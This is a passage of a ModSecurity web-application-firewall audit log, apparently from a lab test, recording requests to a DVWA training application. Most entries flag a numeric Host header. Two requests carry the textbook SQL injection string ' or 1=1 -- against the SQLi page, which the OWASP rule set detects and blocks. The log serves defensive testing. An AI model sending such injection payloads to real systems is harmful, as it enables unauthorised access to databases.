GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"index.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRcQhH8AAQEAAAmHBIwAAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":685,"p2":4322,"p3":170,"p4":407,"p5":97,"sr":27,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:20 --0400","transaction_id":"WRcQhH8AAQEAAAmHBI0AAAAF","remote_address":"192.168.75.130","remote_port":46196,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/index.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"2725","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/index.php\"] [unique_id \"WRcQhH8AAQEAAAmHBI0AAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":612,"p2":2270,"p3":248,"p4":778,"p5":152,"sr":26,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:25 --0400","transaction_id":"WRcQiX8AAQEAAAmHBI4AAAAF","remote_address":"192.168.75.130","remote_port":46196,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQiX8AAQEAAAmHBI4AAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":585,"p2":2456,"p3":109,"p4":610,"p5":96,"sr":26,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:25 --0400","transaction_id":"WRcQiX8AAQEAAAmHBI8AAAAF","remote_address":"192.168.75.130","remote_port":46196,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQiX8AAQEAAAmHBI8AAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":575,"p2":2153,"p3":100,"p4":375,"p5":193,"sr":23,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:30 --0400","transaction_id":"WRcQjn8AAQEAAAkW4RUAAAAB","remote_address":"192.168.75.130","remote_port":46198,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQjn8AAQEAAAkW4RUAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQjn8AAQEAAAkW4RUAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQjn8AAQEAAAkW4RUAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQjn8AAQEAAAkW4RUAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQjn8AAQEAAAkW4RUAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":802,"p2":3045,"p3":0,"p4":0,"p5":120,"sr":27,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:33 --0400","transaction_id":"WRcQkX8AAQEAAAkW4RYAAAAB","remote_address":"192.168.75.130","remote_port":46198,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQkX8AAQEAAAkW4RYAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQkX8AAQEAAAkW4RYAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQkX8AAQEAAAkW4RYAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
